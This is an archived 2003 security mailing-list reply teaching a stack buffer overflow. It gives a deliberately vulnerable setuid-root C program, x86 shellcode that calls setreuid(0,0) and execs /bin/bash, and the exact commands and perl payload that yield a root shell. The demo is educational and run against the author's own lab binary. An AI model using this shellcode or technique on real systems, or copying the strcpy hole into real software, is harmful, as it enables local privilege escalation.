Re: controlling ebp/eip of a frame, does it always lead to possible code execution?
From: Steven Hill (steve_at_covertsystems.org)
Date: 09/19/03
- Previous message: Adam: "Re: OpenSSH Vulnerability"
- In reply to: Ingram: "controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Next in thread: Fisch, Matthew: "RE: controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 19 Sep 2003 16:00:12 +1000 (EST) To: Ingram <Vail@gmx.net>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 18 Sep 2003, Ingram wrote:
> hello,
>
> again i have a little question about buffer overflows,
> that i could not figure out by myself.
>
> If i can control what is written to ebp and eip, i thought
> that this always would be enough to execute shellcode,
> ...it seems not:
>
> >./exploit
> Segmentation fault (core dumped)
> >gdb ./myprog ./myprog.core
>
Ingram,
Try these sample exploit commandline statements,
as it should help you better understand what you
are trying to achieve, then if you prefer, browse
over the attached exploit code.
[steve@covertsystems research]#cat > vuln.c <EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
char buffer[1024];
if(argc > 1)
strcpy(buffer, argv[1]);
return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]#cat > shell2string.c << EOF
#include <stdio.h>
#include <stdlib.h>
char shell[] =
//setreuid(0, 0);
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
//execve("/bin/bash", NULL)
"\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
"\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
"\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
//exit(0);
"x31\xc0\xb0\x01\xcd\x80";
int main(void) {
FILE *fp;
int x;
fp = fopen("shell.txt", "wb");
for(x = 0; x < strlen(shell); x++)
fprintf(fp, "%c", shell[x]);
fclose(fp);
return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]$ gcc shell2string.c
[steve@covertsystems research]$ ./a.out
[steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt
- -rw-rw-r-- 1 steve steve 48 Aug 7 18:32 shell.txt
48 shell.txt
[steve@covertsystems research]$ od -ch shell.txt
0000000 1 300 260 F 1 333 1 311 315 200 1 300 P j h h
c031 46b0 db31 c931 80cd c031 6a50 6868
0000020 / b a s h / b i n 211 343 215 T $ \f P
622f 7361 2f68 6962 896e 8de3 2454 500c
0000040 S 215 \f $ 260 \v 315 200 x 3 1 300 260 001 315 200
8d53 240c 0bb0 80cd 3378 c031 01b0 80cd
0000060
[steve@covertsystems research]# sudo gcc vuln.c -o vuln
[steve@covertsystems research]# sudo chown root.root vuln
[steve@covertsystems research]# sudo chmod 4755 vuln
[steve@covertsystems research]# ls -l vuln
- -rwsr-xr-x 1 root root 11549 Aug 7 18:30 vuln
[steve@covertsystems research]$ export CODE=`cat shell.txt `
[steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}'>
code.c ; gcc code.c -o code ; ./code ; rm -rf code*
0xbfffff84
[steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf
"\x84\xff\xff\xbf";`
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@covertsystems research]# id
uid=0(root) gid=500(steve) groups=500(steve)
[root@covertsystems research]#
Happy Hacking!...
1036 == 1024 + 8[padding] + 4[EBP] +4[EIP]
EIP shall point directly to the shellcode ENV address...
[steve@covertsystems research-1]$ gcc --version
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- --
---=[ Covert Systems Research ]=-----------------------------//
= www.covertsystems.org -
= Exploit Research & Development -
= Specializing in Linux & UNIX Systems -
--------------------------------------------=[ SolarIce ]=---//
--The more one reads & learns, the less the other person knows.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQE/apt1+SI9HWArYE4RAkUZAJoDHN4zfMnIqeGohvvjG+rm/MKpzQCdHOqI
qd6e7QwZcCZVOrDuTHo/Hco=
=7uzm
-----END PGP SIGNATURE-----
- TEXT/PLAIN attachment: shell2string.c
- TEXT/PLAIN attachment: vuln-1.c
- TEXT/PLAIN attachment: exploit-1-1.c
- Previous message: Adam: "Re: OpenSSH Vulnerability"
- In reply to: Ingram: "controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Next in thread: Fisch, Matthew: "RE: controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
